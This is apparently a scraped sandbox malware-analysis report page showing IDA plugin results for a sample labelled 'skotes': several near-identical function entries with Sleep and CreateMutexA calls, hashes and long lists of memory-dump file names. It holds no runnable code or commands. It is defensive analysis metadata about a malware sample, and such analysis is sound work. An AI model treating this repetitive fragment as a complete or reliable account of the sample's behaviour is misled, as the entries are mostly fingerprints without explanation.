Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: ac12dfb8606671dcce601cdbdb5f2bd378355c36fa806b0d5405ec7d8f602ebb
Instruction ID: 97b007058331fad6f6aaf4e5ed30c37d2a243c19d06452e716a85d5d500f2d88
Opcode Fuzzy Hash: ac12dfb8606671dcce601cdbdb5f2bd378355c36fa806b0d5405ec7d8f602ebb
Instruction Fuzzy Hash: C6317B316142048BEF1A9B78CD847ADB7B6EF85310F30C619E014EB2D9C73699808B52

Function 0036A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: b2248ceb75eda2c5ce6d16d401908ceee53fc68d0b5a7fefc7c2d7a3224c6d7e
Instruction ID: ed3f4c9519b0843df5501cd1438283abb4453a182ec29c722baaccd8cb561f14
Opcode Fuzzy Hash: b2248ceb75eda2c5ce6d16d401908ceee53fc68d0b5a7fefc7c2d7a3224c6d7e
Instruction Fuzzy Hash: 013168316146049BEB1A9B78CD89BADB7B2DF86314F20C619E014EB3D9C77699808B53

Function 0036A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: c2cd912a8a766f47f3be2e502df274dfd03acef60ccf7e8c8252c2b36512db73
Instruction ID: 271d24c593f30276ba941c041b48473176f211c67ab661234bf320cf60ee51b6
Opcode Fuzzy Hash: c2cd912a8a766f47f3be2e502df274dfd03acef60ccf7e8c8252c2b36512db73
Instruction Fuzzy Hash: 47316A316046049BEB1A9F78DD89B5DB772EF86310F20C618E004AB2D9C77699808B52

Function 0036A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: 314a929f8e4fbf5e0241da320bb7dc3f6635ff5de7d91cc715009a5d7f49cbc5
Instruction ID: 590ac601c1a8334719b4e6deefa0c74adf34f496f77d7fe049659a54b32549c9
Opcode Fuzzy Hash: 314a929f8e4fbf5e0241da320bb7dc3f6635ff5de7d91cc715009a5d7f49cbc5
Instruction Fuzzy Hash: DA318C316045049BEB1BAB78CD89B6DB771EFC5314F20C618E014AB3C9CB7599808B53

Function 0036A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: 01d713d5c7034867a4e76394d77072b2b73ad320cbb78c00a663338ef79afa3d
Instruction ID: fe6952317280b6fd88a4adc6ff36f1323ca6b8bff5606259d41711c247b28648
Opcode Fuzzy Hash: 01d713d5c7034867a4e76394d77072b2b73ad320cbb78c00a663338ef79afa3d
Instruction Fuzzy Hash: 63316A316055048BEB1AEF78CC89B6DB776EF86314F24C618E044EB2D9C73999808F26

Function 0036A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: 95b8128c7589c218cccce21e0f7c599aedec8e50d5b826946f75ad0299933daa
Instruction ID: 7a9cf8bda4d8e44c34d84c24e44c84cf31a9ceaf57c5a939155d012a5c1fa9da
Opcode Fuzzy Hash: 95b8128c7589c218cccce21e0f7c599aedec8e50d5b826946f75ad0299933daa
Instruction Fuzzy Hash: D5317B316046048BEB1ADF78CD89B6DB7B2DF85314F24C618E014FB2D9C77599808B53

Function 00369ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
